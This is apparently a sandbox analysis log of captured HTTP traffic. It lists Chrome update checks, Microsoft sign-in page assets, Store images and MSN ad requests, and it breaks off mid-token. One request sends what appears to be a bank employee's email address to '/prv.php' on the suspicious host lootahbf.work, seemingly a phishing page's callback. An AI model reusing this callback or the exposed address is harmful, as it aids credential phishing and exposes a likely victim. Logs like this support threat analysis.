Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /prv.phpbsalazar@redriverbank.net HTTP/1.1Host: lootahbf.workConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msftauth.net
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msauth.net
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msftauth.net
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msauth.net
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msftauth.netIf-Modified-Since: Thu, 16 Jan 2020 00:32:52 GMTIf-None-Match: 0x8D79A1B9F5E121A
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msauth.netIf-Modified-Since: Fri, 17 Jan 2020 19:28:34 GMTIf-None-Match: 0x8D79B8371B97A82
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msftauth.netIf-Modified-Since: Wed, 12 Feb 2020 22:01:50 GMTIf-None-Match: 0x8D7B007297AE131
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msauth.netIf-Modified-Since: Tue, 10 Nov 2020 03:41:24 GMTIf-None-Match: 0x8D8852A7FA6B761
Source: global traffic HTTP traffic detected: GET /image/apps.39478.14495311847124170.e89a4dce-fd9a-4a10-b8e4-a6c3aa1c055e.8ad1b690-ff36-44fa-8afc-0dc5bed1273c?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.40093.9007199266285780.3d16d9fa-052b-42c5-ba7d-a5688e3dda24.e6964d6a-18a4-4746-9238-9f0acc233a65?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Thu, 20 Apr 2017 16:10:39 GMTUser-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /image/apps.49525.13510798887047136.8a1815b2-017c-48c8-80cc-ca4d1ae5c8cf.2f6b9bdf-a4fc-42d8-aea0-65c437755b78?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.58298.9007199266285780.3d16d9fa-052b-42c5-ba7d-a5688e3dda24.55988ee1-bd9b-4322-980a-a610abdc7713?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.616.13510798887047136.8a1815b2-017c-48c8-80cc-ca4d1ae5c8cf.d81cfd95-c9fd-48e0-8fc3-36ff7b9e590a?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.15982.13510798883386282.38bb6176-27af-4000-85dd-12a4c12514f2.7bbbe321-5273-45d0-814e-74f2065197d3?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.64128.9007199266246227.c596c546-6fcb-4260-935c-19bc24b971ef.d58015ff-2fcf-4113-975b-e873039b6d86?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.16957.14618985536919905.4b30e4f3-f7a1-4421-840c-2cc97b10e8e0.aef04b90-a221-4ea5-a05d-0d51ac792471?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.18124.9007199266244427.c75d2ced-a383-40dc-babd-1ad2ceb13c86.afc6c372-c7a8-4eda-94fb-541bbb081d14?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.31225.13576748414566955.3d986480-8c1e-4271-9c7c-a90619002084.3ffd9abd-094d-4594-b6c3-8e079298b84b?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.31660.13925855090824389.09f473d9-ce97-499c-9d53-c21e8f64ee62.9cf7ca2f-497e-4cb1-be08-431c9fcc4d54?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.32938.13925855090824389.09f473d9-ce97-499c-9d53-c21e8f64ee62.721cfb02-7935-45dc-9d66-2d6e6b2ff76c?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.38957.9007199266246761.3059e916-5e99-4797-a868-366cc8761e37.dcc9368c-4c77-41a2-b867-8514435d8418?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.39016.9007199266243744.36dde9d0-f21a-47d2-976e-f1ea3f5b031f.bbea1229-a466-4a8c-b428-57cb58abf084?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.41671.13634052595610511.c45457c9-b4af-46b0-8e61-8d7c0aec3f56.86b1d82d-8b47-4bda-99fc-8a1db0a7ac9d?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.5075.9007199266244427.c75d2ced-a383-40dc-babd-1ad2ceb13c86.f329a73d-1ae8-4445-aa4c-bf40f3c5d62d?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.51843.9007199266243449.90709ce3-050c-4cef-8d4a-9ef213b89ef2.c13e8407-eaf8-447a-a5d6-9abd8bc2c1f3?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.52481.9007199266243744.36dde9d0-f21a-47d2-976e-f1ea3f5b031f.16c0a704-aef8-4bc4-af36-0c3b3ee0f6e2?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.54145.14618985536919905.4b30e4f3-f7a1-4421-840c-2cc97b10e8e0.0df01b4e-7fca-47eb-b3d7-95ba7990754d?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.54562.13634052595610511.c45457c9-b4af-46b0-8e61-8d7c0aec3f56.24af4abe-62f8-404b-b1a9-ee8fe4d32d94?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.55990.13510798886747090.a0953092-5fc3-46f0-aefa-796cb3a9b90b.1c9f2174-7e18-48ba-af90-e569a2444a83?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.56668.13510798883386282.38bb6176-27af-4000-85dd-12a4c12514f2.a2d9522a-f7d1-4f21-9ea4-8ba298101695?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.58878.9007199266246761.3059e916-5e99-4797-a868-366cc8761e37.21987aba-4948-4f44-bf2e-eba90517f1c5?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.59367.13510798885854323.dbec43fa-fcea-4036-9b1c-96de66922c18.da850a8e-5b3f-49fd-b3dc-6a8c0db400e4?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.65344.13576748414566955.3d986480-8c1e-4271-9c7c-a90619002084.2a7e9f85-6e2d-4bc7-ad81-13196f5baf00?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.7873.9007199266243449.90709ce3-050c-4cef-8d4a-9ef213b89ef2.7885dc21-4015-4284-a596-d3d24cf6c1b8?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.62687.13510798885854323.6a8c11ad-84e9-4247-9ba9-ab3742bdbb87.e61dfadd-3bdd-4f66-beb1-6bb763b60b02?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.8341.13510798886747090.a0953092-5fc3-46f0-aefa-796cb3a9b90b.fc0c6be7-c064-44dc-a7df-81e7097e3c93?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225155Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=c5b34f363e4a4227b6cb30ca1e71d217&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513697&metered=false&nettype=ethernet&npid=sc-338389&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513697&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAWc4fHREtBciga5Vw5iXaJ6sx9TZW8IgYADJHiIGXNL8wPtkocTaZEDDHgLoiZg16mes7Y8GVz1CTlrB45t2GVd5SDKBlSGXdUp6mP1Ko1dd9LuyIR1FP8Mw0rgjTALiC3W1cXBF3pTTfXErVmp3nR2vsX8O5ZI7XQ4C3iIOekkZRP8KjkavkUgHfRQlpm4mAZTP38TdtRc/6QHQ4llCGSex0FLNotCRLgrOUNNgLsoaTab+A1vtebbI2x9zQGTEeLyfLY+Wu0n7IiJX0kEpX4EkCIVNXWfaaInkbg5JLvUQLruOQTsENQMs8+mDknwKkd1I7J2zn6d/BYYunuA+1lsDZgAACJnFBeZ3AZjpqAEwCc9tFNY5pXTASRDQjzMv92yu+hPL7i6lqIkCfIeJ/ZHHqTa6tqz9hTj+jV1yy7Id9LM45GiyZ/O+WwE7B0S6hQgAiKq2A/EG589OITZRSLKCd4Yk35yA9SQpkuBwWgX+2FnpnAKXDAK5fLh/0xFNGMOPgS9gBR2EaQHNgAvJqg16PNuA6Q9PEr9A5Oh2Q9tFFob3eCrZgLRlHrlPUDJ2Z7AKmIOdNXRxAkKFH2aKanMs36Eg6vWJ+KiHcIwJ6yPClTe6wo+AZOHutL2G7GAUXHpGvfRGoAvjMhxwgvIcXqX5kuzNIEP4iIc08eaQ2pAZhVKxh3LceTB/PfFd2ydRA5Hyf0BNq2Dq3ed+/xJNeFeJwhGSwpl/pKMO6aDcD9evDXJ63dhJLtZZIvOqi2XzO/huVVxb7uUomrsOMaGU3Ne4rjPm+dd+bFPIVx+g5vxfBJLyxpGV61INemGE8tzQADKSkcHixa3R/G4y9VUOQ8SbAEDaLtT5vm+A/iXuw9GEOnhbWTZCsk9OuXB4tmqVhPu1KY08XN17+E106Met/aReV8qhr3ni1QE=&p=Cache-Control: no-cacheMS-CV: dI8PgNjo+ke0xboL.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225154Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9a92f4708df84c9781d2e66fe154310e&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513697&metered=false&nettype=ethernet&npid=sc-280815&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513697&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAZsOXuX/JbjhRGMq3loS0ogrfyhYq6q0ZMd80uaPg9g1fMvc9C9jQzFlGWq9HwGwJBQK5BWLtHUQKXrGS5B0NqmLrhIdkfIAyIfQWBq1vHQHqULKfOllF5lBfPLDkEtzWcFAcU6QtrSOotUbBDpWkmDggwXBfqIgAtfoMbUwVkvsd6MLDG5zPIFqK6CnVOWJYKVIjKSths1SzIS/GOkbsai6FlaN11R03Wluj6o5vdNDnO0c14pQtytyVhEIkyi+kh6gZZT4CN3HR7iNz3AgcsleRJjtdYMx+0AyQQ56iLilxEYEW7xNVy/Jdg/jYBGTwiXcwWA2R3tO7v/TDXnezsEDZgAACINg9LzuZshEqAHLqJUo6jsZmtkxMMWPLR6heRdeFE5Co4ySS36RJGxKbJ3Wi5ig1vDLi+maFOVM8xZwps8jmH6T2VU/ARj6OquUk3Ff9Y/XQ5hhXix0IIsfA7pLstoXZSnmkG+N7aQwYrs925M+3KmyqnS5r3S+HQgRODPk1pvTQewXZCJxVp0oiI7TDuF0mg6nTsnAorXuusZgWOhxY/Sl6RyNAorpeAzlW/4Yd6qNugv2mdC9AxaVlBMUPH2FMJS3hC7CALYfkP2SIeLjpovtS4NJZZ7SxFdXsncITiyumVEYLat2ZALlgIS/BaULfn19tGJ0/UAQ7pX55yG7RglPGvAh+LJl8Eq8YT4d0U9czfLbd71RZhJzdIAdra+YJI5HAGuKFWT/0/eAq1r5dKq9sfVekf5hJ6YnQYzfKQLIMI18Yh0UYdQLVf9N4T9vaH7TsvVtdzMFsr0rzlI51nhzs1G+tchs9q5CtkWVs+TF7xwAICU5USdDzCjRO+M6yjsTKCEGXeI/R48cKVX1UMxISTmOsRBBITG7E84cBhnLhg4+0+48Ib13/ltkKmHjlFC11QE=&p=Cache-Control: no-cacheMS-CV: dI8PgNjo+ke0xboL.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225229Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=eee2c6e085ac4c5eb6bf46697882ac06&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513697&metered=false&nettype=ethernet&npid=sc-338387&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&rver=2&sc-mode=0&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513697&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAZsOXuX/JbjhRGMq3loS0ogrfyhYq6q0ZMd80uaPg9g1fMvc9C9jQzFlGWq9HwGwJBQK5BWLtHUQKXrGS5B0NqmLrhIdkfIAyIfQWBq1vHQHqULKfOllF5lBfPLDkEtzWcFAcU6QtrSOotUbBDpWkmDggwXBfqIgAtfoMbUwVkvsd6MLDG5zPIFqK6CnVOWJYKVIjKSths1SzIS/GOkbsai6FlaN11R03Wluj6o5vdNDnO0c14pQtytyVhEIkyi+kh6gZZT4CN3HR7iNz3AgcsleRJjtdYMx+0AyQQ56iLilxEYEW7xNVy/Jdg/jYBGTwiXcwWA2R3tO7v/TDXnezsEDZgAACINg9LzuZshEqAHLqJUo6jsZmtkxMMWPLR6heRdeFE5Co4ySS36RJGxKbJ3Wi5ig1vDLi+maFOVM8xZwps8jmH6T2VU/ARj6OquUk3Ff9Y/XQ5hhXix0IIsfA7pLstoXZSnmkG+N7aQwYrs925M+3KmyqnS5r3S+HQgRODPk1pvTQewXZCJxVp0oiI7TDuF0mg6nTsnAorXuusZgWOhxY/Sl6RyNAorpeAzlW/4Yd6qNugv2mdC9AxaVlBMUPH2FMJS3hC7CALYfkP2SIeLjpovtS4NJZZ7SxFdXsncITiyumVEYLat2ZALlgIS/BaULfn19tGJ0/UAQ7pX55yG7RglPGvAh+LJl8Eq8YT4d0U9czfLbd71RZhJzdIA